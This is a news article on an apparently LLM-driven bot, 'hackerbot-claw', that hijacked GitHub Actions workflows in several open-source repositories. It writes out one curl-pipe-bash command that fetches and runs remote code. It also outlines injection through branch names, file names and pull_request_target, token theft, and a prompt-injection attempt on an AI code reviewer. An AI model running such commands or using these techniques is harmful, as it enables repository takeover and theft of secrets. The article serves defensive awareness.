The Rise of the Autonomous Adversary: How “Hackerbot-Claw” Hijacked Major Open-Source Repositories

According to a StepSecurity report, over the past week, an unidentified bot with the telling name “hackerbot-claw” launched a relentless hunt against prominent open-source projects, clearly highlighting the lingering vulnerabilities within build infrastructures. This automated program systematically searched for weak points in GitHub Actions workflows, achieving remote code execution in several instances, and in certain cases, taking complete control of the repository.

These attacks persisted from February 21 to February 28, 2026. The “hackerbot-claw” account, created on February 20, declared itself an “autonomous security research agent” powered by a language model, and even listed cryptocurrency wallets for donations. Within a single week, the bot opened over ten pull requests, deliberately testing the build scripts in repositories connected to Microsoft, Datadog, the Cloud Native Computing Foundation, alongside major independent projects.

The general strategy remained consistent. The bot would create a branch or a pull request, trigger the automated validation process, and quietly slip in a malicious command similar to curl -sSfL hackmoltrepeat.com/molt | bash. From there, the build script itself would execute the attacker’s code inside the continuous integration environment. In five out of seven cases, the attacks were entirely or partially successful.

The most damaging episode unfolded within the avelino/awesome-go repository, one of the most popular lists of Go projects. The bot exploited a common configuration error, where the pull_request_target event gives the workflow access to the main repository’s secrets, while the system still loads code from an external branch. The malicious code was added to the init() function of a utility Go script used for quality checks. During the build, this function ran automatically and sent a GITHUB_TOKEN with write permissions to an external server. Logs confirmed that the check was successful, though the step took noticeably longer than usual. The stolen token then allowed the attacker to modify code and merge pull requests.

Did you find this article helpful? Stay connected and subscribe so you never miss an update.

The project-akri/akri initiative suffered a similar fate. There, the attacker simply added a harmful line to the version.sh script and left a comment that triggered an automated version update. Without verifying the author, the script executed code from an external branch and ran the embedded command.

In the microsoft/ai-discovery-agent repository, the attack was even more inventive. The payload was hidden directly in the branch name. When the script wrote the branch name to a file using the shell, the interpreter executed command substitution. The build log showed a two-minute gap, which is a classic sign of an external script being downloaded and run.

Targeting datadog/datadog-iac-scanner, the bot encoded the command within a file name using base64. The script passed the file name into a shell loop without escaping it, which again led to the command being executed. The Datadog team closed the vulnerability about nine hours later by adding author permission checks and tightening the launch parameters.

The most high-profile incident was the breach of Aqua Security and the Trivy project. The bot used the same pull_request_target mechanism to inject code into the Go setup action and steal a personal access token. Nineteen minutes after the script started, the stolen token was used to push changes directly to the main repository. The attacker made the project private, renamed it, deleted releases from version 0.27.0 to 0.69.1, and uploaded a suspicious file to the Trivy extension for Visual Studio Code. The Aqua Security team later restored the repository and released version 0.69.2, but the star count was reset to zero because the project had to be recreated.

In the ambient-code/platform project, the bot tried to capitalize on a modern trend by attacking an automated code review system powered by the Claude model, rather than a human. Instructions were added to a configuration file to force the model to make outside changes and approve the request. The model recognized the prompt injection and refused to follow the instructions, explicitly pointing out the attempted manipulation. Here, the defense worked successfully.

Finally, the last target was RustPython/RustPython. Once again, a base64-encoded command was hidden in the branch name. The auto-formatting script ran with elevated privileges and inserted the branch name into a git push command. In one run, the substitution worked partially, but a decoding error prevented the command from reaching the script-download stage.

In total, the bot used five different techniques: injecting code into scripts, manipulating branch names, substituting file names, exploiting pull_request_target, and attempting to poison instructions for an artificial intelligence model. Five of the seven targets were compromised to some extent. In the case of Trivy, the attack led to a complete takeover of the repository and the deletion of its releases.

This story proves that automated bots are already scanning open-source projects around the clock, without breaks or weekends. A flawed build script configuration becomes a direct path to secrets and tokens with write access. Developers must carefully reconsider how they use pull_request_target, limit the permissions of the GITHUB_TOKEN, and closely check what data enters shell commands without being properly escaped.